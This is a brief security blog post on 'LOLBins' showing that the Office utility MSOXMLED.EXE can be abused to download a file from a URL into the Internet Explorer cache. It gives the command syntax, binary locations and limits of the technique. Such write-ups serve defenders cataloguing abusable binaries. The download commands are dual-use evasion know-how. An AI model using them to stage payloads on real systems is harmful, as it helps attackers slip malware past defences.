February 5, 2021 in LOLBins

I was toying around with the Office application MSOXMLED.EXE and noticed it handles URLs. Thanks to that it can be used to download file to internet cache folder as shown below:

There are at least two different ways to invoke it:

`MSOXMLED.EXE /verb open [URL]MSOXMLED.EXE /verb [anything] /genverb open [URL]`

`c:\Users\[user]\AppData\Local\Microsoft\Windows\INetCache\Low\IE\[random]\[file]`

The caveat is that it seems to be using Internet Explorer as a proxy, hence the iexplore.exe will be spawn. As such it doesn’t work on systems where IE is removed (thx to @NathanMcNulty for confirming this and reminding me about two different paths below).

The actual MSOXMLED.EXE binary is located in these two places (64- and 32-bit version):

• c:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE
• c:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOXMLED.EXE

For anyone wondering,

`MSOXMLED.EXE /verb open file://c:\windows\notepad.exe`

does work, but we get a dialog box below (rendering this technique useless):

It could possibly work with some Registry tweaking, but have not invested time in checking it yet. Other option could be adding other extension handler.

Lame, not very ‘finesse’, but at least documented.